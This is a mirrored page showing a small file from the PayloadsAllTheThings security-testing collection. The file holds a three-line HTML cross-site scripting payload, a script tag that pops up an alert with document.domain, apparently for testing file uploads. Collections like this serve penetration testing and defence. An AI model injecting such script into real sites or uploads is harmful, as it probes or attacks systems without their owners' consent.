1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-08-22 06:59:50 +02:00
PayloadsAllTheThings/XSS Injection/Files/xss.url.url
2019-08-18 12:08:51 +02:00

3 lines
60 B
INI

<html>
<script>alert(document.domain)</script>
</html>